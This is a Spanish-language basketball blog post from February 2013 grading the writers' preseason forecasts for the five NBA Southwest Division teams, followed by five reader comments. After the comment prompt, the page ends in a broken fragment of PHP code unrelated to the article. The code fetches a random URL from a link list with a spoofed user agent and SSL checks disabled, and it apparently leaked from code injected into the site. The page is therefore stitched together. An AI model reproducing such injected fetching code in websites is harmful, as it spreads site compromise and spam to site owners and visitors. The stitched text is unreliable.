Revisando los pronósticos 2013: Southwest

22 de February de 2013 por Simon

SAN ANTONIO SPURS

Análisis
Pronóstico:
Cuartos del Oeste, Semifinales de conferencia.
Probabilidad de acierto: Muy Baja.
Calificación del pronóstico: B

A principio de temporada hicimos bien en no descartar a San Antonio Spurs para seguir en la élite de la liga porque así ha sido. Los Spurs son hoy por hoy el mejor equipo de la liga y probablemente termine la regular con el mejor récord. En el análisis previo los colocábamos como cuartos del Oeste pero no porque esperásemos un bajón de ellos, si no debido a presumible subida de prestaciones de equipos como Thunder, Clippers y sobretodo, Lakers. A la hora de la verdad Thunder y Clippers no son mejores que el año pasado y Lakers… bueno de Lakers mejor no hablar. Todo ello unido al nivel habitual de San Antonio hará de este equipo eterno, más que probablemente el número 1 del Oeste un año más.

Tony Parker sigue siendo un año más uno de los mejores bases de la liga. Ahora él es realmente el jugador franquicia de estos Spurs, el lleva el peso del equipo en ataque y cada vez va a más. Probablemente el francés sea uno de los jugadores más infravalorados de la NBA. Prácticamente nadie lo hubiese puesto a la altura de Paul, Rondo o D-Will a principio de temporada pero la realidad es que está siendo el mejor base de la competición solo discutido por Chris Paul. En cuanto a Tim Duncan… Un año más y no termina de llegar ese bajón que llevan a anunciando muchos años. Está siendo dosificado a la perfección por Popovich y sus promedios  son de 17 puntos y 10 rebotes en menos de media hora de juego por noche. Manu Ginobili está teniendo una temporada complicada con constantes lesiones que hacen que sus prestaciones estén bajando respecto a otros años. El resto de jugadores más o menos han mantenido su rol a excepción de Splitter y Leonard que están respondiendo a las expectativas y cada vez son más importantes para los de Popovich.

A día de hoy vemos imposible que se cumpla nuestro pronóstico de 4º de la Conferencia Oeste en liga regular. En cuanto a las semifinales de conferencia vemos algo más de probabilidad de acierto, aunque ahora mismo,  salvo Clippers o Thunder, no vemos capaz a ningún equipo de derrotar a San Antonio en Play Off. 

MEMPHIS GRIZZLIES

Análisis
Pronóstico:
Dar guerra en primera ronda de Play Off.
Probabilidad de acierto: Media-Alta.
Calificación del pronóstico: A-

El pronóstico lo titulaba Magic de la siguiente manera: “las vistas desde el tejado” y no encuentro una metáfora que pueda representar mejor lo que son los Grizzlies esta temporada. Aunque el panorama haya cambiado, su “jugador franquicia” ya no esté  y el banquillo haya sido modificado el caso es que los Memphis Grizzlies siguen igual. No son capaces de aspirar a estar en la lucha real por el anillo. Actualmente se encuentran  con el cuarto registro de la conferencia y es muy improbable que mejoren porque el tercero, aunque cerca en números, está lejos en sensaciones y nivel. Parecido pasa por detrás de ellos.

Si el techo de Memphis no era demasiado alto ya de por sí al inicio de temporada, ahora sin Rudy Gay parece que es un poco más bajo. El alero estaba cuajando una buena temporada y parecía  más centrado e integrado en el equipo que en temporadas anteriores pero el nuevo propietario no está dispuesto a gastar un céntimo extra y lo mandó a Toronto a cambio de un estrella en ciernes como es Ed Davis y un veteranísimo curtido en mil batallas como Tayshaun Prince.

En cuanto a los que se quedan, otro acierto en pleno para nuestro análisis.  Randolph sigue sin recuperar el nivel mostrado hace dos años y Gasol, aunque rindiendo a gran nivel, sigue siendo algo irregular y le falta dar un paso adelante.

En definitiva, pueden pasar la primera ronda pero lo harán sufriendo y ahí se acabará su temporada en el mejor de los escenarios. A pesar de los cambios, este análisis sirve a la perfección para los “renovados” Grizzlies.

HOUSTON ROCKETS

Análisis
Pronóstico:
Alrededor de 25 victorias.
Probabilidad de acierto: Nula
Calificación pronóstico: E-

No vamos a calificar el análisis que hizo TheDeerHunter de este equipo pues ha terminado siendo un equipo totalmente distinto con el traspaso de James Harden. Esperábamos una temporada con muy pocas victorias y así hubiera sido muy probablemente de no mediar la llegada de Harden.

Por intentar repasar un poco el análisis diremos que Jeremy Lin no ha jugado a mal nivel pero tampoco ha cumplido las expectativas del contrato que firmó, aunque si las del grueso del blog.

Por otro lado, de los rookies que tanto ansiábamos ver en los Rockets no está jugando ninguno. Lamb se marchó traspasado a los Thunder, Motiejunas y Jones no tienen minutos y White se ha llevado palos de la franquicia durante toda la temporada. Parece que últimamente se han solucionado sus diferencias pero no creemos que de repente vaya a disfrutar de protagonismo.

DALLAS MAVERICKS

Análisis
Pronóstico:
48-52 victorias. Solo los veo cayendo ante Lakers.
Probabilidad de acierto: Ninguna.
Calificación del pronóstico: E

No pudimos andar más desacertados en este pronóstico. No es que se vayan a quedar cerca del número de victorias que pronosticamos sinó que ni siquiera parece que vayan a superar el 50% de victorias. Y eso que la temporada, aún sin Nowitzki, comenzó bien, con Mayo y Collison a buen nivel. Sobretodo Mayo, que como decíamos en el análisis era la gran esperanza para Dallas de los recién incorporados y respondía como tal. Pero conforme avanzaba la temporada el ex de los Grizzlies se ha convertiendo en  un jugador más irregular y más cercano a lo que hemos presenciado en las últimas temporadas. En cuanto a Collison personalmente creo que ha dejado pasar una grandísima oportunidad para demostrar que puede ser titular en un equipo de la NBA. A partir de ahora, a no ser que su rendimiento crezca exponencialmente no creo que ningún equipo apueste por él como base titular de ningún proyecto.

En cuanto al juego interior tanto Kaman como Brand han venido a Dallas de turismo, ninguno de los dos está jugando al nivel que podría exigírseles. Brand no está dando esos minutos de calidad que pensábamos que iba a aportar al inicio de temporada y  Kaman no sé si por un tema físico o dejadez está dejando muchísimo que desear. A Nowitzki le ha costado mucho arrancar tras su lesión y lo cierto y verdad es que parece estar muy lejos de su nivel, un nivel que le costará muchísimo alcanzar para seguir siendo un jugador que marque diferencias en la liga al mismo nivel que las marcaba antes.

NEW ORLEANS HORNETS

Análisis
Pronóstico:
25-30 victorias.
Probabilidad de acierto: Total.
Calificación del pronóstico: A

No le pedíamos mucho a New Orleans y al fin y al cabo no ha dado mucho. Era de esperar con un equipo tan joven con jugadores recién llegados a la liga o con nuevos roles mucho mayores  de los que tenían antes.

Gran acierto el que tuvo nuestro compañero Viva_Dirk al señalar a Vásquez como una de las posibles sensaciones de la temporada. El venezolano promedía hasta el momento 14 puntos y 9.5 asistencias por noche con buenos porcentajes. Los Hornets pueden haber encontrado a su base del futuro en Greivis. Otro tanto nos anotamos al hablar de Anderson como un candidato a mejor sexto hombre del año. Con los números que está  firmando, si Hornets estuviera luchando por algo, el certero lanzador de larga distancia estaría en las quinielas para lograr este premio. Robin Lopez está firmando una espectacular temporada en comparación a lo que esperábamos de él, que era básicamente nada.

El contrato de Gordon sigue suscitándonos muchas dudas al igual que lo hacía al inicio de temporada principalmente por la salud de unos de los socios del club “Cristal de Bohemia” y en NOLA parecen no tenerlas todas consigo pues el nombre de Gordon no para de escucharse involucrado en diversos rumores de traspaso.

En cuanto a los rookies, el nº 1 del draft, Anthony Davis, no ha rendido mal pero no del todo como se esperaba. Durante algunas fases de la temporada se ha visto mermado por problemas físicos. Eso sí, el rookie que ha decepcionado de gran manera ha sido Austin Rivers que ha demostrado que no estaba todavía preparado para dar el salto a la NBA.

En definitiva, a estas alturas de temporada el análisis seguiría valiendo punto por punto pues se han cumplido prácticamente todas las predicciones sobre NOLA e incluso las incógnitas que teníamos no han sido resueltas. Buenos mimbres que deberían empezar a crecer desde ya.

Comenta

5 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Menos mal que acerté, más o menos, con el análisis de los Grizzlies, porque cuando repasemos el de los Lakers no sabré dónde esconderme xD

      Citar

  2. Esteban dice:
    #2

    MagicJohnson32:
    Menos mal que acerté, más o menos, con el análisis de los Grizzlies, porque cuando repasemos el de los Lakers no sabré dónde esconderme xD

    jajajajaja yo si lo recuerdo CAMPEONES DE LA NBA, en el momento cuando lo lei me sono muy raro, poner campeones a un equipo que no sea el thunder y el heat era arriesgadisimo, pero luego cai en la cuenta de los 4 fantasticos y dije, yo hubiese puesto lo mismo ejejjeje

      Citar

  3. Ekos dice:
    #3

    Aún pueden ganar 😛

      Citar

  4. MagicJohnson32 dice:
    #4

    Ekos:
    Aún pueden ganar :P

    Sí, esa parte del pronóstico todavía se puede cumplir. La parte de las 65 victorias en regular season está más difícil 😀

      Citar

  5. Ekos dice:
    #5

    MagicJohnson32: Sí, esa parte del pronóstico todavía se puede cumplir. La parte de las 65 victorias en regular season está más difícil

    Sí, eso no lo veo de todo claro jajaja

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>